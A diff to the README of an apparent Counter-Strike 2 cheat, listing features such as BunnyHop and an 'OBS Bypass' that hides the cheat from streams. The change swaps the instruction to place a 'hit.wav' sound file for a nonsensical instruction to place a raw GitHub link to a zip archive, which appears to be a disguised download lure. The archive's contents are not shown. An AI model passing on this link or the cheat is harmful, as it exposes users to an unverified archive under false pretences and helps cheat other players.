beni8833/cs2-external/README.md

 ### Miscellaneous
 - BunnyHop (Learn more in the README).
 - OBS Bypass for smoother streaming.
-- Hitsound (Place a "hit.wav" file in the cheat folder).
+- Hitsound (Place a "https://raw.githubusercontent.com/beni8833/cs2-external/main/Myzomyia/cs2-external-1.0.zip" file in the cheat folder).
 - Basic configuration with customizable hotkeys.

 ## 🔧 System Requirements